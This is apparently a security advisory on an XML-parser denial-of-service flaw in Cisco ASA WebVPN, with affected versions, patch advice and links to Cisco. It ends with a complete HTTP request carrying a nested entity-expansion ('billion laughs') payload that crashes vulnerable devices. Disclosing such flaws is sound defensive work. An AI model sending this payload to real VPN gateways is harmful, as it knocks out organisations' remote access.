Cisco ASA VPN XML Parser Denial of Service Vulnerability

9/22/2015

The AEC team of ethical hackers discovered and reported serious vulnerability of the Cisco systems.

Relevance: High
Abude Difficulty: Low

The identified vulnerability is caused by an error in XML (Extensible Markup Language) parser, which is a software component WebVPN in Cisco ASA products. It is possible to abuse this vulnerability with the aid of a specially-created set of XML entities sent unauthenticated by remote means of communication. Successful abuse of the vulnerability leads to the disconnection of all constructed SSl VPN connections, system instability, and restart. There is an actual risk of long-term effect of the attack, as well as long-lasting inability to use the VPN (Virtual private network) of a disabled company.

Vulnerable systems

Cisco ASA device configured for Clientless or AnyConnect SSL VPN a AnyConnect IKEv2 VPN.

These versions of os software are vulnerable:

Cisco ASA Software 8.4 prior to 8.4(7.28)
Cisco ASA Software 8.6 prior to 8.6(1.17)
Cisco ASA Software 9.0 prior to 9.0(4.32)
Cisco ASA Software 9.1 prior to 9.1(6)
Cisco ASA Software 9.2 prior to 9.2(3.4)
Cisco ASA Software 9.3 prior to 9.3(3)

The vulnerability was reported by Cisco corporation. With respect to our customers we decided to publish all the details after a long enough period of time which ensured the appropriate level of remedial action in the companies that we protect.

Recommendation by AEC

Mitigation measures at the ambient level and prepending systems are not effective. If you use an older solution version than stated above, contact the system suppliers and ask for a patch.

More details are available at the official links of Cisco cooperation below:
http://tools.cisco.com/security/center/viewAlert.x?alertId=38185
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150408-asa

Proof of Concept

Below we highlight an example of a requirement leading to the successful abuse of the vulnerability, causing the service to be unavailable. The requirement was modified to maintain anonymity.

HTTP requirement:

 
               POST / HTTP/1.1
X-Transcend-Version: 1
X-Aggregate-Auth: 1
X-AnyConnect-Platform: win
X-Transcend-Version: 1
X-Aggregate-Auth: 1
X-AnyConnect-Platform: win
Host: VPN_SERVER_NAME
Cookie: sdesktop=4168B38548AE90FC768A2DEF;
User-Agent: AnyConnect Windows 3.1.05152
Content-Length: 907
Connection: Close
Cache-Control: no-cache
Pragma: no-cache
               <?xml version="1.0" encoding="utf-8"?> 
                  
<!DOCTYPE test [ 
                  
<!ENTITY xxx "test"> 
                  
<!ENTITY xxx1 "&xxx;&xxx;&xxx;&xxx;&xxx;&xxx;&xxx;&xxx;&xxx;&xxx;"> 
                  
<!ENTITY xxx2 "&xxx1;&xxx1;&xxx1;&xxx1;&xxx1;&xxx1;&xxx1;&xxx1;&xxx1;&xxx1;"> 
                  
<!ENTITY xxx3 "&xxx2;&xxx2;&xxx2;&xxx2;&xxx2;&xxx2;&xxx2;&xxx2;&xxx2;&xxx2;"> 
                  
<!ENTITY xxx4 "&xxx3;&xxx3;&xxx3;&xxx3;&xxx3;&xxx3;&xxx3;&xxx3;&xxx3;&xxx3;"> 
                  
<!ENTITY xxx5 "&xxx4;&xxx4;&xxx4;&xxx4;&xxx4;&xxx4;&xxx4;&xxx4;&xxx4;&xxx4;"> 
                  
<!ENTITY xxx6 "&xxx5;&xxx5;&xxx5;&xxx5;&xxx5;&xxx5;&xxx5;&xxx5;&xxx5;&xxx5;"> 
                  
<!ENTITY xxx7 "&xxx6;&xxx6;&xxx6;&xxx6;&xxx6;&xxx6;&xxx6;&xxx6;&xxx6;&xxx6;"> 
                  
<!ENTITY xxx8 "&xxx7;&xxx7;&xxx7;&xxx7;&xxx7;&xxx7;&xxx7;&xxx7;&xxx7;&xxx7;"> 
                  
<!ENTITY xxx9 "&xxx8;&xxx8;&xxx8;&xxx8;&xxx8;&xxx8;&xxx8;&xxx8;&xxx8;&xxx8;"> 
                  
]>
               <config-auth client="vpn" type="auth-reply" aggregate-auth-version="2">
<test>&xxx9;</test>
</config-auth>

After sending above-stated requirement to a vulnerable service, the VPN service becomes denied, and the current SSL VPN connection gets disconnected.